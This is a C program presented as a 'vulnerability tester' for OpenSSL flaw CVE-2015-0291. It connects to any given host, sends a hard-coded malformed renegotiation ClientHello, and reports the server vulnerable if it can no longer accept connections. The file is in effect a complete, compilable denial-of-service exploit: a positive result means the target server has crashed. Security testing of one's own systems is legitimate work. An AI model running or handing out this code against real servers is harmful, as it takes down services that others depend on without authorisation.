/*
* Client Nullo
* vulnerability tester for CVE-2015-0291
* by: mancha (twitter: @mancha140)
*
* $ gcc -o clientnullo clientnullo.c -lcrypto -lssl
* $ ./clientnullo [host] [port]
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <openssl/rand.h>
#include <openssl/ssl.h>
#include <openssl/err.h>
#define do_error(m) { perror(m); exit(1); }
#define do_ssl_error() { ERR_print_errors_fp(stderr); exit(1); }
static char nullo[80] = {
0x01, 0x00, 0x00, 0x4c, 0x03, 0x03, 0x0c, 0x04, 0xe2, 0xd0,
0xe7, 0x72, 0xe2, 0x5b, 0x7f, 0x6d, 0x08, 0xc1, 0xa3, 0xd0,
0xcf, 0x61, 0x98, 0xff, 0xa3, 0xf4, 0x40, 0x81, 0x15, 0x5f,
0x6e, 0x58, 0x22, 0x0b, 0x5b, 0xfa, 0x03, 0x14, 0x00, 0x00,
0x02, 0x00, 0x2f, 0x01, 0x00, 0x00, 0x21, 0x00, 0x23, 0x00,
0x00, 0x00, 0x0d, 0x00, 0x08, 0x00, 0x06, 0x6d, 0x61, 0x6e,
0x63, 0x68, 0x61, 0xff, 0x01, 0x00, 0x0d, 0x0c };
int main(int argc, char **argv)
{
int sockfd;
struct addrinfo hints, *results;
SSL_CTX *ctx;
SSL *ssl;
if (argc != 3) {
printf("Usage: %s [host] [service/port]\n", argv[0]);
exit(1);
}
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if (getaddrinfo(argv[1], argv[2], &hints, &results)) {
fprintf(stderr, "getaddrinfo error\n");
exit(1);
}
if ((sockfd = socket(results->ai_family, results->ai_socktype,
results->ai_protocol)) == -1)
do_error("socket");
if (connect(sockfd, results->ai_addr, results->ai_addrlen) == -1)
do_error("connect");
SSL_load_error_strings();
SSL_library_init();
if (!(ctx = SSL_CTX_new(TLSv1_2_client_method())))
do_ssl_error();
if (!SSL_CTX_set_cipher_list(ctx, "AES128-SHA"))
do_ssl_error();
if(!(ssl = SSL_new(ctx)))
do_ssl_error();
if(!SSL_set_fd(ssl, sockfd))
do_ssl_error();
if(SSL_connect(ssl) != 1)
do_ssl_error();
memcpy(&nullo[68], ssl->s3->previous_client_finished, 12);
if (ssl3_write_bytes(ssl, SSL3_RT_HANDSHAKE, nullo, 80) <= 0)
do_ssl_error();
SSL_shutdown(ssl);
SSL_free(ssl);
close(sockfd);
SSL_CTX_free(ctx);
sleep(2);
sockfd = socket(results->ai_family, results->ai_socktype,
results->ai_protocol);
if (connect(sockfd, results->ai_addr, results->ai_addrlen) == -1)
printf("VULNERABLE\n");
else
printf("not vulnerable\n");
close(sockfd);
freeaddrinfo(results);
return 0;
}